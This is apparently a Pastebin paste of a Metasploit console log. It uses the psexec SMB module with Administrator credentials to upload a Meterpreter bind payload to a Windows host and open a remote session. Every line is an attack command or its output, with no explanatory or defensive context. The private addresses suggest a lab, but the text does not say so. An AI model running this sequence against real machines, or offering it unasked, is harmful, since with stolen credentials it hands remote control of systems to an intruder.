Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- use exploit/windows/smb/psexec
- exploit(psexec) > set PAYLOAD windows/meterpreter/bind_tcp
- PAYLOAD => windows/meterpreter/bind_tcp
- exploit(psexec) > set DCERPC::fake_bind_multi false
- DCERPC::fake_bind_multi => false
- exploit(psexec) > set LPORT 4445
- LPORT => 4445
- exploit(psexec) > set RHOST 192.168.1.21
- RHOST => 192.168.1.21
- exploit(psexec) > set SMBPass password
- SMBPass => password
- exploit(psexec) > set SMBUser Administrator
- SMBUser => Administrator
- exploit(psexec) > exploit
- [*] Connecting to the server...
- [*] Started bind handler
- [*] Authenticating to 192.168.1.21:445|WORKGROUP as user 'Administrator'...
- [*] Uploading payload...
- [*] Created \QDauyXip.exe...
- [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.21[\svcctl] ...
- [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.21[\svcctl] ...
- [*] Obtaining a service manager handle...
- [*] Creating a new service (urVJxdlg - "MXGqFoBD")...
- [*] Closing service handle...
- [*] Opening service...
- [*] Starting the service...
- [*] Removing the service...
- [*] Closing service handle...
- [*] Deleting \QDauyXip.exe...
- [*] Sending stage (752128 bytes) to 192.168.1.21
- [*] Meterpreter session 3 opened (192.168.1.11:41106 -> 192.168.1.21:4445) at 2011-07-22 20:30:14 -0500
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement